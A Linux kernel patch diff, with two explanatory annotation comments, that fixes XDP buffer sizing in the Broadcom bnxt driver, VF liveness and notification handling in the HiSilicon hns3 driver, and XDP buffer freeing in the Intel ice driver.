+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -988,8 +988,7 @@ static struct sk_buff *bnxt_rx_multi_page_skb(struct bnxt *bp,
+ 	dma_addr -= bp->rx_dma_offset;
+ 	dma_unmap_page_attrs(&bp->pdev->dev, dma_addr, PAGE_SIZE, bp->rx_dir,
+ 			     DMA_ATTR_WEAK_ORDERING);
+-	skb = build_skb(page_address(page), BNXT_PAGE_MODE_BUF_SIZE +
+-					    bp->rx_dma_offset);
++	skb = build_skb(page_address(page), PAGE_SIZE);
+ 	if (!skb) {
+ 		__free_page(page);
+ 		return NULL;
+@@ -1922,7 +1921,7 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 	dma_addr = rx_buf->mapping;
+ 
+ 	if (bnxt_xdp_attached(bp, rxr)) {
+-		bnxt_xdp_buff_init(bp, rxr, cons, &data_ptr, &len, &xdp);
++		bnxt_xdp_buff_init(bp, rxr, cons, data_ptr, len, &xdp);
+ 		if (agg_bufs) {
+ 			u32 frag_len = bnxt_rx_agg_pages_xdp(bp, cpr, &xdp,
+ 							     cp_cons, agg_bufs,
+@@ -1937,7 +1936,7 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 	}
+ 
+ 	if (xdp_active) {
+-		if (bnxt_rx_xdp(bp, rxr, cons, xdp, data, &len, event)) {
++		if (bnxt_rx_xdp(bp, rxr, cons, xdp, data, &data_ptr, &len, event)) {
+ 			rc = 1;
+ 			goto next_rx;
+ 		}
+@@ -3966,8 +3965,10 @@ void bnxt_set_ring_params(struct bnxt *bp)
+ 		bp->rx_agg_ring_mask = (bp->rx_agg_nr_pages * RX_DESC_CNT) - 1;
+ 
+ 		if (BNXT_RX_PAGE_MODE(bp)) {
+-			rx_space = BNXT_PAGE_MODE_BUF_SIZE;
+-			rx_size = BNXT_MAX_PAGE_MODE_MTU;
++			rx_space = PAGE_SIZE;
++			rx_size = PAGE_SIZE -
++				  ALIGN(max(NET_SKB_PAD, XDP_PACKET_HEADROOM), 8) -
++				  SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+ 		} else {
+ 			rx_size = SKB_DATA_ALIGN(BNXT_RX_COPY_THRESH + NET_IP_ALIGN);
+ 			rx_space = rx_size + NET_SKB_PAD +
+@@ -5370,15 +5371,16 @@ static int bnxt_hwrm_vnic_set_hds(struct bnxt *bp, u16 vnic_id)
+ 	req->flags = cpu_to_le32(VNIC_PLCMODES_CFG_REQ_FLAGS_JUMBO_PLACEMENT);
+ 	req->enables = cpu_to_le32(VNIC_PLCMODES_CFG_REQ_ENABLES_JUMBO_THRESH_VALID);
+ 
+-	if (BNXT_RX_PAGE_MODE(bp) && !BNXT_RX_JUMBO_MODE(bp)) {
++	if (BNXT_RX_PAGE_MODE(bp)) {
++		req->jumbo_thresh = cpu_to_le16(bp->rx_buf_use_size);
++	} else {
+ 		req->flags |= cpu_to_le32(VNIC_PLCMODES_CFG_REQ_FLAGS_HDS_IPV4 |
+ 					  VNIC_PLCMODES_CFG_REQ_FLAGS_HDS_IPV6);
+ 		req->enables |=
+ 			cpu_to_le32(VNIC_PLCMODES_CFG_REQ_ENABLES_HDS_THRESHOLD_VALID);
++		req->jumbo_thresh = cpu_to_le16(bp->rx_copy_thresh);
++		req->hds_threshold = cpu_to_le16(bp->rx_copy_thresh);
+ 	}
+-	/* thresholds not implemented in firmware yet */
+-	req->jumbo_thresh = cpu_to_le16(bp->rx_copy_thresh);
+-	req->hds_threshold = cpu_to_le16(bp->rx_copy_thresh);
+ 	req->vnic_id = cpu_to_le32(vnic->fw_vnic_id);
+ 	return hwrm_req_send(bp, req);
+ }
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.h b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+index d5fa43cfe5248..02741d499bf4a 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.h
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+@@ -591,12 +591,20 @@ struct nqe_cn {
+ #define BNXT_RX_PAGE_SIZE (1 << BNXT_RX_PAGE_SHIFT)
+ 
+ #define BNXT_MAX_MTU		9500
+-#define BNXT_PAGE_MODE_BUF_SIZE \
++
++/* First RX buffer page in XDP multi-buf mode
++ *
++ * +-------------------------------------------------------------------------+
++ * | XDP_PACKET_HEADROOM | bp->rx_buf_use_size              | skb_shared_info|
++ * | (bp->rx_dma_offset) |                                  |                |
++ * +-------------------------------------------------------------------------+
++ */
++#define BNXT_MAX_PAGE_MODE_MTU_SBUF \
+ 	((unsigned int)PAGE_SIZE - VLAN_ETH_HLEN - NET_IP_ALIGN -	\
+ 	 XDP_PACKET_HEADROOM)
+ #define BNXT_MAX_PAGE_MODE_MTU	\
+-	BNXT_PAGE_MODE_BUF_SIZE - \
+-	SKB_DATA_ALIGN((unsigned int)sizeof(struct skb_shared_info))
++	(BNXT_MAX_PAGE_MODE_MTU_SBUF - \
++	 SKB_DATA_ALIGN((unsigned int)sizeof(struct skb_shared_info)))
+ 
+ #define BNXT_MIN_PKT_SIZE	52
+ 
+@@ -2131,7 +2139,6 @@ struct bnxt {
+ #define BNXT_DUMP_CRASH		1
+ 
+ 	struct bpf_prog		*xdp_prog;
+-	u8			xdp_has_frags;
+ 
+ 	struct bnxt_ptp_cfg	*ptp_cfg;
+ 	u8			ptp_all_rx_tstamp;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c
+index c3065ec0a4798..36d5202c0aeec 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c
+@@ -177,7 +177,7 @@ bool bnxt_xdp_attached(struct bnxt *bp, struct bnxt_rx_ring_info *rxr)
+ }
+ 
+ void bnxt_xdp_buff_init(struct bnxt *bp, struct bnxt_rx_ring_info *rxr,
+-			u16 cons, u8 **data_ptr, unsigned int *len,
++			u16 cons, u8 *data_ptr, unsigned int len,
+ 			struct xdp_buff *xdp)
+ {
+ 	struct bnxt_sw_rx_bd *rx_buf;
+@@ -191,13 +191,10 @@ void bnxt_xdp_buff_init(struct bnxt *bp, struct bnxt_rx_ring_info *rxr,
+ 	offset = bp->rx_offset;
+ 
+ 	mapping = rx_buf->mapping - bp->rx_dma_offset;
+-	dma_sync_single_for_cpu(&pdev->dev, mapping + offset, *len, bp->rx_dir);
+-
+-	if (bp->xdp_has_frags)
+-		buflen = BNXT_PAGE_MODE_BUF_SIZE + offset;
++	dma_sync_single_for_cpu(&pdev->dev, mapping + offset, len, bp->rx_dir);
+ 
+ 	xdp_init_buff(xdp, buflen, &rxr->xdp_rxq);
+-	xdp_prepare_buff(xdp, *data_ptr - offset, offset, *len, false);
++	xdp_prepare_buff(xdp, data_ptr - offset, offset, len, false);
+ }
+ 
+ void bnxt_xdp_buff_frags_free(struct bnxt_rx_ring_info *rxr,
+@@ -222,7 +219,8 @@ void bnxt_xdp_buff_frags_free(struct bnxt_rx_ring_info *rxr,
+  * false   - packet should be passed to the stack.
+  */
+ bool bnxt_rx_xdp(struct bnxt *bp, struct bnxt_rx_ring_info *rxr, u16 cons,
+-		 struct xdp_buff xdp, struct page *page, unsigned int *len, u8 *event)
++		 struct xdp_buff xdp, struct page *page, u8 **data_ptr,
++		 unsigned int *len, u8 *event)
+ {
+ 	struct bpf_prog *xdp_prog = READ_ONCE(rxr->xdp_prog);
+ 	struct bnxt_tx_ring_info *txr;
+@@ -255,8 +253,10 @@ bool bnxt_rx_xdp(struct bnxt *bp, struct bnxt_rx_ring_info *rxr, u16 cons,
+ 		*event &= ~BNXT_RX_EVENT;
+ 
+ 	*len = xdp.data_end - xdp.data;
+-	if (orig_data != xdp.data)
++	if (orig_data != xdp.data) {
+ 		offset = xdp.data - xdp.data_hard_start;
++		*data_ptr = xdp.data_hard_start + offset;
++	}
+ 
+ 	switch (act) {
+ 	case XDP_PASS:
+@@ -401,10 +401,8 @@ static int bnxt_xdp_set(struct bnxt *bp, struct bpf_prog *prog)
+ 		netdev_warn(dev, "ethtool rx/tx channels must be combined to support XDP.\n");
+ 		return -EOPNOTSUPP;
+ 	}
+-	if (prog) {
++	if (prog)
+ 		tx_xdp = bp->rx_nr_rings;
+-		bp->xdp_has_frags = prog->aux->xdp_has_frags;
+-	}
+ 
+ 	tc = netdev_get_num_tc(dev);
+ 	if (!tc)
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.h b/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.h
+index 505911ae095d3..ea430d6961df3 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.h
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.h
+@@ -18,8 +18,8 @@ struct bnxt_sw_tx_bd *bnxt_xmit_bd(struct bnxt *bp,
+ 				   struct xdp_buff *xdp);
+ void bnxt_tx_int_xdp(struct bnxt *bp, struct bnxt_napi *bnapi, int nr_pkts);
+ bool bnxt_rx_xdp(struct bnxt *bp, struct bnxt_rx_ring_info *rxr, u16 cons,
+-		 struct xdp_buff xdp, struct page *page, unsigned int *len,
+-		 u8 *event);
++		 struct xdp_buff xdp, struct page *page, u8 **data_ptr,
++		 unsigned int *len, u8 *event);
+ int bnxt_xdp(struct net_device *dev, struct netdev_bpf *xdp);
+ int bnxt_xdp_xmit(struct net_device *dev, int num_frames,
+ 		  struct xdp_frame **frames, u32 flags);
+@@ -27,7 +27,7 @@ int bnxt_xdp_xmit(struct net_device *dev, int num_frames,
+ bool bnxt_xdp_attached(struct bnxt *bp, struct bnxt_rx_ring_info *rxr);
+ 
+ void bnxt_xdp_buff_init(struct bnxt *bp, struct bnxt_rx_ring_info *rxr,
+-			u16 cons, u8 **data_ptr, unsigned int *len,
++			u16 cons, u8 *data_ptr, unsigned int len,
+ 			struct xdp_buff *xdp);
+ void bnxt_xdp_buff_frags_free(struct bnxt_rx_ring_info *rxr,
+ 			      struct xdp_buff *xdp);
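/* Annotation, not part of the patch: worked numbers for the new rx_size
 * computation in bnxt_set_ring_params(), assuming a 4 KiB page,
 * XDP_PACKET_HEADROOM = 256 >= NET_SKB_PAD, and
 * SKB_DATA_ALIGN(sizeof(struct skb_shared_info)) = 320 (typical on
 * x86-64; both values are config-dependent):
 *
 *   rx_space = PAGE_SIZE = 4096
 *   rx_size  = 4096 - ALIGN(256, 8) - 320 = 3520
 *
 * i.e. build_skb() now receives the full page, and the usable packet
 * area is what remains after XDP headroom and shared-info tailroom.
 */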
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 028577943ec57..248f15dac86ba 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -3855,18 +3855,16 @@ static int hns3_gro_complete(struct sk_buff *skb, u32 l234info)
+ 	return 0;
+ }
+ 
+-static bool hns3_checksum_complete(struct hns3_enet_ring *ring,
++static void hns3_checksum_complete(struct hns3_enet_ring *ring,
+ 				   struct sk_buff *skb, u32 ptype, u16 csum)
+ {
+ 	if (ptype == HNS3_INVALID_PTYPE ||
+ 	    hns3_rx_ptype_tbl[ptype].ip_summed != CHECKSUM_COMPLETE)
+-		return false;
++		return;
+ 
+ 	hns3_ring_stats_update(ring, csum_complete);
+ 	skb->ip_summed = CHECKSUM_COMPLETE;
+ 	skb->csum = csum_unfold((__force __sum16)csum);
+-
+-	return true;
+ }
+ 
+ static void hns3_rx_handle_csum(struct sk_buff *skb, u32 l234info,
+@@ -3926,8 +3924,7 @@ static void hns3_rx_checksum(struct hns3_enet_ring *ring, struct sk_buff *skb,
+ 		ptype = hnae3_get_field(ol_info, HNS3_RXD_PTYPE_M,
+ 					HNS3_RXD_PTYPE_S);
+ 
+-	if (hns3_checksum_complete(ring, skb, ptype, csum))
+-		return;
++	hns3_checksum_complete(ring, skb, ptype, csum);
+ 
+ 	/* check if hardware has done checksum */
+ 	if (!(bd_base_info & BIT(HNS3_RXD_L3L4P_B)))
+@@ -3936,6 +3933,7 @@ static void hns3_rx_checksum(struct hns3_enet_ring *ring, struct sk_buff *skb,
+ 	if (unlikely(l234info & (BIT(HNS3_RXD_L3E_B) | BIT(HNS3_RXD_L4E_B) |
+ 				 BIT(HNS3_RXD_OL3E_B) |
+ 				 BIT(HNS3_RXD_OL4E_B)))) {
++		skb->ip_summed = CHECKSUM_NONE;
+ 		hns3_ring_stats_update(ring, l3l4_csum_err);
+ 
+ 		return;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 4e54f91f7a6c1..07ad5f35219e2 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -3910,9 +3910,17 @@ static int hclge_set_all_vf_rst(struct hclge_dev *hdev, bool reset)
+ 			return ret;
+ 		}
+ 
+-		if (!reset || !test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state))
++		if (!reset ||
++		    !test_bit(HCLGE_VPORT_STATE_INITED, &vport->state))
+ 			continue;
+ 
++		if (!test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state) &&
++		    hdev->reset_type == HNAE3_FUNC_RESET) {
++			set_bit(HCLGE_VPORT_NEED_NOTIFY_RESET,
++				&vport->need_notify);
++			continue;
++		}
++
+ 		/* Inform VF to process the reset.
+ 		 * hclge_inform_reset_assert_to_vf may fail if VF
+ 		 * driver is not loaded.
+@@ -4609,18 +4617,25 @@ static void hclge_reset_service_task(struct hclge_dev *hdev)
+ 
+ static void hclge_update_vport_alive(struct hclge_dev *hdev)
+ {
++#define HCLGE_ALIVE_SECONDS_NORMAL		8
++
++	unsigned long alive_time = HCLGE_ALIVE_SECONDS_NORMAL * HZ;
+ 	int i;
+ 
+ 	/* start from vport 1 for PF is always alive */
+ 	for (i = 1; i < hdev->num_alloc_vport; i++) {
+ 		struct hclge_vport *vport = &hdev->vport[i];
+ 
+-		if (time_after(jiffies, vport->last_active_jiffies + 8 * HZ))
++		if (!test_bit(HCLGE_VPORT_STATE_INITED, &vport->state) ||
++		    !test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state))
++			continue;
++		if (time_after(jiffies, vport->last_active_jiffies +
++			       alive_time)) {
+ 			clear_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state);
+-
+-		/* If vf is not alive, set to default value */
+-		if (!test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state))
+-			vport->mps = HCLGE_MAC_DEFAULT_FRAME;
++			dev_warn(&hdev->pdev->dev,
++				 "VF %u heartbeat timeout\n",
++				 i - HCLGE_VF_VPORT_START_NUM);
++		}
+ 	}
+ }
+ 
+@@ -8064,9 +8079,11 @@ int hclge_vport_start(struct hclge_vport *vport)
+ {
+ 	struct hclge_dev *hdev = vport->back;
+ 
++	set_bit(HCLGE_VPORT_STATE_INITED, &vport->state);
+ 	set_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state);
+ 	set_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE, &vport->state);
+ 	vport->last_active_jiffies = jiffies;
++	vport->need_notify = 0;
+ 
+ 	if (test_bit(vport->vport_id, hdev->vport_config_block)) {
+ 		if (vport->vport_id) {
+@@ -8084,7 +8101,9 @@ int hclge_vport_start(struct hclge_vport *vport)
+ 
+ void hclge_vport_stop(struct hclge_vport *vport)
+ {
++	clear_bit(HCLGE_VPORT_STATE_INITED, &vport->state);
+ 	clear_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state);
++	vport->need_notify = 0;
+ }
+ 
+ static int hclge_client_start(struct hnae3_handle *handle)
+@@ -9208,7 +9227,8 @@ static int hclge_set_vf_mac(struct hnae3_handle *handle, int vf,
+ 		return 0;
+ 	}
+ 
+-	dev_info(&hdev->pdev->dev, "MAC of VF %d has been set to %s\n",
++	dev_info(&hdev->pdev->dev,
++		 "MAC of VF %d has been set to %s, will be active after VF reset\n",
+ 		 vf, format_mac_addr);
+ 	return 0;
+ }
+@@ -10465,12 +10485,16 @@ static int hclge_set_vf_vlan_filter(struct hnae3_handle *handle, int vfid,
+ 	 * for DEVICE_VERSION_V3, vf doesn't need to know about the port based
+ 	 * VLAN state.
+ 	 */
+-	if (ae_dev->dev_version < HNAE3_DEVICE_VERSION_V3 &&
+-	    test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state))
+-		(void)hclge_push_vf_port_base_vlan_info(&hdev->vport[0],
+-							vport->vport_id,
+-							state, &vlan_info);
+-
++	if (ae_dev->dev_version < HNAE3_DEVICE_VERSION_V3) {
++		if (test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state))
++			(void)hclge_push_vf_port_base_vlan_info(&hdev->vport[0],
++								vport->vport_id,
++								state,
++								&vlan_info);
++		else
++			set_bit(HCLGE_VPORT_NEED_NOTIFY_VF_VLAN,
++				&vport->need_notify);
++	}
+ 	return 0;
+ }
+ 
+@@ -11941,7 +11965,7 @@ static void hclge_reset_vport_state(struct hclge_dev *hdev)
+ 	int i;
+ 
+ 	for (i = 0; i < hdev->num_alloc_vport; i++) {
+-		hclge_vport_stop(vport);
++		clear_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state);
+ 		vport++;
+ 	}
+ }
+@@ -12754,60 +12778,71 @@ static int hclge_gro_en(struct hnae3_handle *handle, bool enable)
+ 	return ret;
+ }
+ 
+-static void hclge_sync_promisc_mode(struct hclge_dev *hdev)
++static int hclge_sync_vport_promisc_mode(struct hclge_vport *vport)
+ {
+-	struct hclge_vport *vport = &hdev->vport[0];
+ 	struct hnae3_handle *handle = &vport->nic;
++	struct hclge_dev *hdev = vport->back;
++	bool uc_en = false;
++	bool mc_en = false;
+ 	u8 tmp_flags;
++	bool bc_en;
+ 	int ret;
+-	u16 i;
+ 
+ 	if (vport->last_promisc_flags != vport->overflow_promisc_flags) {
+ 		set_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE, &vport->state);
+ 		vport->last_promisc_flags = vport->overflow_promisc_flags;
+ 	}
+ 
+-	if (test_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE, &vport->state)) {
++	if (!test_and_clear_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE,
++				&vport->state))
++		return 0;
++
++	/* for PF */
++	if (!vport->vport_id) {
+ 		tmp_flags = handle->netdev_flags | vport->last_promisc_flags;
+ 		ret = hclge_set_promisc_mode(handle, tmp_flags & HNAE3_UPE,
+ 					     tmp_flags & HNAE3_MPE);
+-		if (!ret) {
+-			clear_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE,
+-				  &vport->state);
++		if (!ret)
+ 			set_bit(HCLGE_VPORT_STATE_VLAN_FLTR_CHANGE,
+ 				&vport->state);
+-		}
++		else
++			set_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE,
++				&vport->state);
++		return ret;
+ 	}
+ 
+-	for (i = 1; i < hdev->num_alloc_vport; i++) {
+-		bool uc_en = false;
+-		bool mc_en = false;
+-		bool bc_en;
++	/* for VF */
++	if (vport->vf_info.trusted) {
++		uc_en = vport->vf_info.request_uc_en > 0 ||
++			vport->overflow_promisc_flags & HNAE3_OVERFLOW_UPE;
++		mc_en = vport->vf_info.request_mc_en > 0 ||
++			vport->overflow_promisc_flags & HNAE3_OVERFLOW_MPE;
++	}
++	bc_en = vport->vf_info.request_bc_en > 0;
+ 
+-		vport = &hdev->vport[i];
++	ret = hclge_cmd_set_promisc_mode(hdev, vport->vport_id, uc_en,
++					 mc_en, bc_en);
++	if (ret) {
++		set_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE, &vport->state);
++		return ret;
++	}
++	hclge_set_vport_vlan_fltr_change(vport);
+ 
+-		if (!test_and_clear_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE,
+-					&vport->state))
+-			continue;
++	return 0;
++}
+ 
+-		if (vport->vf_info.trusted) {
+-			uc_en = vport->vf_info.request_uc_en > 0 ||
+-				vport->overflow_promisc_flags &
+-				HNAE3_OVERFLOW_UPE;
+-			mc_en = vport->vf_info.request_mc_en > 0 ||
+-				vport->overflow_promisc_flags &
+-				HNAE3_OVERFLOW_MPE;
+-		}
+-		bc_en = vport->vf_info.request_bc_en > 0;
++static void hclge_sync_promisc_mode(struct hclge_dev *hdev)
++{
++	struct hclge_vport *vport;
++	int ret;
++	u16 i;
+ 
+-		ret = hclge_cmd_set_promisc_mode(hdev, vport->vport_id, uc_en,
+-						 mc_en, bc_en);
+-		if (ret) {
+-			set_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE,
+-				&vport->state);
++	for (i = 0; i < hdev->num_alloc_vport; i++) {
++		vport = &hdev->vport[i];
++
++		ret = hclge_sync_vport_promisc_mode(vport);
++		if (ret)
+ 			return;
+-		}
+-		hclge_set_vport_vlan_fltr_change(vport);
+ 	}
+ }
+ 
+@@ -12944,6 +12979,11 @@ static void hclge_clear_vport_vf_info(struct hclge_vport *vport, int vfid)
+ 	struct hclge_vlan_info vlan_info;
+ 	int ret;
+ 
++	clear_bit(HCLGE_VPORT_STATE_INITED, &vport->state);
++	clear_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state);
++	vport->need_notify = 0;
++	vport->mps = 0;
++
+ 	/* after disable sriov, clean VF rate configured by PF */
+ 	ret = hclge_tm_qs_shaper_cfg(vport, 0);
+ 	if (ret)
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
+index 495b639b0dc24..13f23d606e77b 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.h
+@@ -995,9 +995,15 @@ enum HCLGE_VPORT_STATE {
+ 	HCLGE_VPORT_STATE_MAC_TBL_CHANGE,
+ 	HCLGE_VPORT_STATE_PROMISC_CHANGE,
+ 	HCLGE_VPORT_STATE_VLAN_FLTR_CHANGE,
++	HCLGE_VPORT_STATE_INITED,
+ 	HCLGE_VPORT_STATE_MAX
+ };
+ 
++enum HCLGE_VPORT_NEED_NOTIFY {
++	HCLGE_VPORT_NEED_NOTIFY_RESET,
++	HCLGE_VPORT_NEED_NOTIFY_VF_VLAN,
++};
++
+ struct hclge_vlan_info {
+ 	u16 vlan_proto; /* so far support 802.1Q only */
+ 	u16 qos;
+@@ -1044,6 +1050,7 @@ struct hclge_vport {
+ 	struct hnae3_handle roce;
+ 
+ 	unsigned long state;
++	unsigned long need_notify;
+ 	unsigned long last_active_jiffies;
+ 	u32 mps; /* Max packet size */
+ 	struct hclge_vf_info vf_info;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
+index a7b06c63143cc..04ff9bf121853 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_mbx.c
+@@ -124,17 +124,26 @@ static int hclge_send_mbx_msg(struct hclge_vport *vport, u8 *msg, u16 msg_len,
+ 	return status;
+ }
+ 
++static int hclge_inform_vf_reset(struct hclge_vport *vport, u16 reset_type)
++{
++	__le16 msg_data;
++	u8 dest_vfid;
++
++	dest_vfid = (u8)vport->vport_id;
++	msg_data = cpu_to_le16(reset_type);
++
++	/* send this requested info to VF */
++	return hclge_send_mbx_msg(vport, (u8 *)&msg_data, sizeof(msg_data),
++				  HCLGE_MBX_ASSERTING_RESET, dest_vfid);
++}
++
+ int hclge_inform_reset_assert_to_vf(struct hclge_vport *vport)
+ {
+ 	struct hclge_dev *hdev = vport->back;
+-	__le16 msg_data;
+ 	u16 reset_type;
+-	u8 dest_vfid;
+ 
+ 	BUILD_BUG_ON(HNAE3_MAX_RESET > U16_MAX);
+ 
+-	dest_vfid = (u8)vport->vport_id;
+-
+ 	if (hdev->reset_type == HNAE3_FUNC_RESET)
+ 		reset_type = HNAE3_VF_PF_FUNC_RESET;
+ 	else if (hdev->reset_type == HNAE3_FLR_RESET)
+@@ -142,11 +151,7 @@ int hclge_inform_reset_assert_to_vf(struct hclge_vport *vport)
+ 	else
+ 		reset_type = HNAE3_VF_FUNC_RESET;
+ 
+-	msg_data = cpu_to_le16(reset_type);
+-
+-	/* send this requested info to VF */
+-	return hclge_send_mbx_msg(vport, (u8 *)&msg_data, sizeof(msg_data),
+-				  HCLGE_MBX_ASSERTING_RESET, dest_vfid);
++	return hclge_inform_vf_reset(vport, reset_type);
+ }
+ 
+ static void hclge_free_vector_ring_chain(struct hnae3_ring_chain_node *head)
+@@ -652,9 +657,56 @@ static int hclge_reset_vf(struct hclge_vport *vport)
+ 	return hclge_func_reset_cmd(hdev, vport->vport_id);
+ }
+ 
++static void hclge_notify_vf_config(struct hclge_vport *vport)
++{
++	struct hclge_dev *hdev = vport->back;
++	struct hnae3_ae_dev *ae_dev = pci_get_drvdata(hdev->pdev);
++	struct hclge_port_base_vlan_config *vlan_cfg;
++	int ret;
++
++	hclge_push_vf_link_status(vport);
++	if (test_bit(HCLGE_VPORT_NEED_NOTIFY_RESET, &vport->need_notify)) {
++		ret = hclge_inform_vf_reset(vport, HNAE3_VF_PF_FUNC_RESET);
++		if (ret) {
++			dev_err(&hdev->pdev->dev,
++				"failed to inform VF %u reset!",
++				vport->vport_id - HCLGE_VF_VPORT_START_NUM);
++			return;
++		}
++		vport->need_notify = 0;
++		return;
++	}
++
++	if (ae_dev->dev_version < HNAE3_DEVICE_VERSION_V3 &&
++	    test_bit(HCLGE_VPORT_NEED_NOTIFY_VF_VLAN, &vport->need_notify)) {
++		vlan_cfg = &vport->port_base_vlan_cfg;
++		ret = hclge_push_vf_port_base_vlan_info(&hdev->vport[0],
++							vport->vport_id,
++							vlan_cfg->state,
++							&vlan_cfg->vlan_info);
++		if (ret) {
++			dev_err(&hdev->pdev->dev,
++				"failed to inform VF %u port base vlan!",
++				vport->vport_id - HCLGE_VF_VPORT_START_NUM);
++			return;
++		}
++		clear_bit(HCLGE_VPORT_NEED_NOTIFY_VF_VLAN, &vport->need_notify);
++	}
++}
++
+ static void hclge_vf_keep_alive(struct hclge_vport *vport)
+ {
++	struct hclge_dev *hdev = vport->back;
++
+ 	vport->last_active_jiffies = jiffies;
++
++	if (test_bit(HCLGE_VPORT_STATE_INITED, &vport->state) &&
++	    !test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state)) {
++		set_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state);
++		dev_info(&hdev->pdev->dev, "VF %u is alive!",
++			 vport->vport_id - HCLGE_VF_VPORT_START_NUM);
++		hclge_notify_vf_config(vport);
++	}
+ }
+ 
+ static int hclge_set_vf_mtu(struct hclge_vport *vport,
+@@ -954,6 +1006,7 @@ static int hclge_mbx_vf_uninit_handler(struct hclge_mbx_ops_param *param)
+ 	hclge_rm_vport_all_mac_table(param->vport, true,
+ 				     HCLGE_MAC_ADDR_MC);
+ 	hclge_rm_vport_all_vlan_table(param->vport, true);
++	param->vport->mps = 0;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+index db6f7cdba9587..081bd2c3f2891 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+@@ -2767,7 +2767,8 @@ static int hclgevf_pci_reset(struct hclgevf_dev *hdev)
+ 	struct pci_dev *pdev = hdev->pdev;
+ 	int ret = 0;
+ 
+-	if (hdev->reset_type == HNAE3_VF_FULL_RESET &&
++	if ((hdev->reset_type == HNAE3_VF_FULL_RESET ||
++	     hdev->reset_type == HNAE3_FLR_RESET) &&
+ 	    test_bit(HCLGEVF_STATE_IRQ_INITED, &hdev->state)) {
+ 		hclgevf_misc_irq_uninit(hdev);
+ 		hclgevf_uninit_msi(hdev);
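/* Annotation, not part of the patch: the hns3 hunks above split vport
 * liveness into two bits -- INITED (driver loaded, set in
 * hclge_vport_start()) and ALIVE (heartbeat seen recently).  Sketch of
 * the keep-alive transition, mirroring hclge_vf_keep_alive():
 *
 *   if (test_bit(HCLGE_VPORT_STATE_INITED, &vport->state) &&
 *       !test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state)) {
 *           set_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state);
 *           hclge_notify_vf_config(vport);  // replay reset/VLAN notices
 *   }
 *
 * so configuration pushed while the VF was down is delivered once it
 * comes back, instead of being lost.
 */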
+diff --git a/drivers/net/ethernet/intel/ice/ice_xsk.c b/drivers/net/ethernet/intel/ice/ice_xsk.c
+index 056c904b83ccb..79fa65d1cf201 100644
+--- a/drivers/net/ethernet/intel/ice/ice_xsk.c
++++ b/drivers/net/ethernet/intel/ice/ice_xsk.c
+@@ -772,7 +772,7 @@ construct_skb:
+ static void
+ ice_clean_xdp_tx_buf(struct ice_tx_ring *xdp_ring, struct ice_tx_buf *tx_buf)
+ {
+-	xdp_return_frame((struct xdp_frame *)tx_buf->raw_buf);
++	page_frag_free(tx_buf->raw_buf);
+ 	xdp_ring->xdp_tx_active--;
+ 	dma_unmap_single(xdp_ring->dev, dma_unmap_addr(tx_buf, dma),
